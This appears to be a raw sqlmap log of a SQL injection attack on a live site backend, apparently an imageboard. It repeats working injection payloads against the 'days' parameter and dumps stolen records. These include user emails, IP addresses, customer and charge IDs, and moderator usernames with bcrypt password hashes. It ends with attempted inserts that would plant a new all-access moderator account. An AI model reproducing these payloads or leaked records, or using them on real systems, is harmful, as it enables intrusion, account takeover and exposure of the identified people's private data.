Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from pass_users limit 1 [13]:
[*]
[*] 0
[*] 00009d0e7aba920ccca2f990e7cfcb91
[*] 00DZGKGJ6U
[*] 1
[*] 198.23.103.67
[*] 2013-10-09 22:18:18
[*] 2014-04-19 02:30:01
[*] 2014-10-09 22:18:18
[*] ch_1jeoAzqV0QfUL8
[*] GKLwaBHpTJsmk
[*] rytxbbc@gmail.com
[*] US
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select user_hash from pass_users limit 1: '00DZGKGJ6U'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select user_hash from pass_users where = 'L1GSD9FEVL': None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from pass_users where = 'L1GSD9FEVL': None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select user_hash from pass_users where user_hash = 'L1GSD9FEVL' [1]:
[*] L1GSD9FEVL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from pass_users where user_hash = 'L1GSD9FEVL' [2]:
[*] cus_1XfRp5bkR0kHBh, anont@hotmail.fr, 0, 1, 1, 2014-03-22 07:35:39, , 0, 0, , 82.231.136.215, 0, 2014-03-21 21:27:34, , 985addf33d9a5f80bd97af8e38d1a961, , 2013-03-22 07:35:39, FR, 82.231.136.215, 1383338587, , , 1, ch_1VURDlhApDYFgY, L1GSD9FEVL
[*] cus_1XfRp5bkR0kHBh, anont@hotmail.fr, 0, 0, 1, 2015-03-22 08:49:54, , 1, 0, FR, 82.231.136.215, 0, 2014-04-19 20:12:36, FR, 0f3d567f5224f90be74ee784f13f9661, D9igJdkTy.7cE, 2014-03-22 08:49:54, FR, 82.231.136.215, 0, , , 0, ch_3iF3rvZIjS6hk6, L1GSD9FEVL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
Database: information_schema
[63 tables]
+---------------------------------------+
| CHARACTER_SETS |
| CLIENT_STATISTICS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INDEX_STATISTICS |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_PAGES |
| INNODB_BUFFER_POOL_PAGES_BLOB |
| INNODB_BUFFER_POOL_PAGES_INDEX |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CHANGED_PAGES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_INDEX_STATS |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_RSEG |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_FIELDS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_INDEXES |
| INNODB_SYS_STATS |
| INNODB_SYS_TABLES |
| INNODB_SYS_TABLESTATS |
| INNODB_TABLE_STATS |
| INNODB_TRX |
| INNODB_UNDO_LOGS |
| KEY_CACHES |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| QUERY_CACHE_INFO |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TABLE_STATISTICS |
| TRIGGERS |
| USER_PRIVILEGES |
| USER_STATISTICS |
| VIEWS |
| XTRADB_ADMIN_COMMAND |
+---------------------------------------+
Database: backend
[34 tables]
+---------------------------------------+
| janitor_apps_backup_2-2014 |
| janitor_apps_backup_9-2012 |
| actions_log |
| ads_advertisers |
| ads_campaigns |
| ads_keywords |
| ads_products |
| appeals |
| ban_request_stats |
| ban_requests |
| ban_templates |
| banned_users |
| banned_users_backup |
| blacklist |
| blotter_messages |
| boardlist |
| del_log |
| domainlist |
| janitor_apps |
| keyword_log |
| mod_users |
| pass_users |
| pass_users_testing |
| post_filter |
| post_filter_categories |
| preserved_information |
| prof_times |
| reporter_stats |
| reports |
| reports_for_posts |
| suggestion_box |
| user_actions |
| users_sync |
| xff |
+---------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sleect * from janitor_apps limit 1 [1]:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
Database: information_schema
[63 tables]
+---------------------------------------+
| CHARACTER_SETS |
| CLIENT_STATISTICS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INDEX_STATISTICS |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_PAGES |
| INNODB_BUFFER_POOL_PAGES_BLOB |
| INNODB_BUFFER_POOL_PAGES_INDEX |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CHANGED_PAGES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_INDEX_STATS |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_RSEG |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_FIELDS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_INDEXES |
| INNODB_SYS_STATS |
| INNODB_SYS_TABLES |
| INNODB_SYS_TABLESTATS |
| INNODB_TABLE_STATS |
| INNODB_TRX |
| INNODB_UNDO_LOGS |
| KEY_CACHES |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| QUERY_CACHE_INFO |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TABLE_STATISTICS |
| TRIGGERS |
| USER_PRIVILEGES |
| USER_STATISTICS |
| VIEWS |
| XTRADB_ADMIN_COMMAND |
+---------------------------------------+
Database: backend
[34 tables]
+---------------------------------------+
| janitor_apps_backup_2-2014 |
| janitor_apps_backup_9-2012 |
| actions_log |
| ads_advertisers |
| ads_campaigns |
| ads_keywords |
| ads_products |
| appeals |
| ban_request_stats |
| ban_requests |
| ban_templates |
| banned_users |
| banned_users_backup |
| blacklist |
| blotter_messages |
| boardlist |
| del_log |
| domainlist |
| janitor_apps |
| keyword_log |
| mod_users |
| pass_users |
| pass_users_testing |
| post_filter |
| post_filter_categories |
| preserved_information |
| prof_times |
| reporter_stats |
| reports |
| reports_for_posts |
| suggestion_box |
| user_actions |
| users_sync |
| xff |
+---------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from mod_users order by id desc [2]:
[*] janitor, m, , Fourtheo@live.com, , 339, {"24.85.70.165":1397976147}, 2654, 2014-04-19 21:12:24, $2y$10$V7JYgJcVwHrpxvjLJ4fSNuc7GUu6dfMSQZ3q.XQpcV9Y4fFudFa3u, 0, MRC-F20
[*] janitor, gif, , virginbbc@gmail.com, , 338, {"98.80.219.107":1397976201}, 1047, 2014-04-18 14:21:30, $2y$10$lsnb2ekr2jFaSdQQmGAmwOiWo2i6UAdgVLGoMawaJBAtkvTbNZxGO, 0, vBBC
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from mod_users where password_expired <> 0 order by id desc [5]:
[*] janitor, c, , CommieTaoist@gmail.com, , 318, {"65.60.200.140":1396677877,"10.0.0.19":1396601660}, 1036, 2014-04-02 22:31:04, $2y$10$isAJqSgR7/tZ1Vkbc2TQK..jahdp9n10.7TMEphE10dn83ZzIhpJO, 1, CommieT
[*] janitor, vp,an, , andrew3227@hotmail.com, , 312, {"37.203.149.137":1396047611,"10.0.0.19":1396047543}, 1850, 2014-03-28 17:18:38, $2y$10$k3PhnafOUJFuoyN4gZNavu.Dt0Nuihq88JfhRwrf2dorKl5fMv3oi, 1, Astyanax
[*] janitor, sp, , joeyrsk@hotmail.com, , 301, {"74.98.187.36":1397324785,"10.0.0.19":1397318289}, 831, 2014-03-19 19:32:21, $2y$10$wMLQlBEqzymKNKupyLZk5.o0gc3Kj2rKju2lHVrSPC1R73BZPdCAa, 1, Rzk3
[*] mod, all, , willard@vorpalweb.com, , 278, {"69.163.178.136":0,"142.255.43.189":1396235197}, 0, 2014-03-30 22:10:24, $2y$10$0GTByCWKATmBuwGAF8pMk.ZuG35Jkfwh0hl7cl4.s1l.v5q21IhwC, 1, pixel
[*] janitor, a,jp, , jfc0104@gmail.com, , 277, {"99.121.68.13":1397123118,"10.0.0.100":0,"10.0.0.19":1396976972}, 6074, 2014-03-15 09:12:45, $2y$10$w/Z7J7F4Yhy9HQEM1PQqzOK55yXqeZzC3q1whHYvLzgSbYlbhwuCG, 1, Caelum
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
SELECT level, allow, email, flags, id, janitorapp_id, last_login, password, password_expired, username FROM mod_users WHERE password_expired <> 0 ORDER BY id desc [9]:
[*] janitor, c, CommieTaoist@gmail.com, , 318, 1036, 2014-04-02 22:31:04, $2y$10$isAJqSgR7/tZ1Vkbc2TQK..jahdp9n10.7TMEphE10dn83ZzIhpJO, 1, CommieT
[*] janitor, vp,an, andrew3227@hotmail.com, , 312, 1850, 2014-03-28 17:18:38, $2y$10$k3PhnafOUJFuoyN4gZNavu.Dt0Nuihq88JfhRwrf2dorKl5fMv3oi, 1, Astyanax
[*] janitor, sp, joeyrsk@hotmail.com, , 301, 831, 2014-03-19 19:32:21, $2y$10$wMLQlBEqzymKNKupyLZk5.o0gc3Kj2rKju2lHVrSPC1R73BZPdCAa, 1, Rzk3
[*] mod, all, willard@vorpalweb.com, , 278, 0, 2014-03-30 22:10:24, $2y$10$0GTByCWKATmBuwGAF8pMk.ZuG35Jkfwh0hl7cl4.s1l.v5q21IhwC, 1, pixel
[*] janitor, a,jp, jfc0104@gmail.com, , 277, 6074, 2014-03-15 09:12:45, $2y$10$w/Z7J7F4Yhy9HQEM1PQqzOK55yXqeZzC3q1whHYvLzgSbYlbhwuCG, 1, Caelum
[*] janitor, adv,r,gif, alpha46@comcast.net, , 275, 4870, 2014-03-18 04:33:29, $2y$10$H0hHR.869zzsh5PSBW.sxeuTgJWJa1nNKqKqq17VfXzgjNfHbgz2C, 1, Halcyon
[*] janitor, vg, ericphillips2@gmail.com, , 265, 5474, 2014-03-24 18:49:51, $2y$10$odLs6DX9fhE5fUW3JC0CH./wuVX0IqCAPAXjTDlLABiMo3yqhx38W, 1, Acidflashback
[*] janitor, co,vr,asp, Captainbison@hotmail.ca, , 243, 6320, 2014-03-16 02:29:28, $2y$10$UAcQcD/wgo1PQzYUa.wLZe8AarVfwh6Fm2MHRpwq.DP91.Lw8OsGe, 1, captainbison
[*] janitor, mlp, raggnarok42@gmail.com, , 241, 4215, 2014-03-22 22:03:46, $2y$10$mDhB1ZOrNnB5nS8hO73R0e2XH.B08VKiuDr2BO6/HMTDlzjS7awHm, 1, Cray
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
SELECT ip, action, COUNT(*) as cnt from reporter_stats WHERE date >= DATE_SUB(NOW(), INTERVAL 3 DAY) GROUP BY ip, action: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
insert into mod_users (allow,flags,username,password) values ("all","developer","hughrichards", "$2y$10$isAJqSgR7/tZ1Vkbc2TQK..jahdp9n10.7TMEphE10dn83ZzIhpJO: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
insert into mod_users (allow,flags,username,password) values ("all","developer","hughrichards", "$2y$10$isAJqSgR7/tZ1Vkbc2TQK..jahdp9n10.7TMEphE10dn83ZzIhpJO): None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
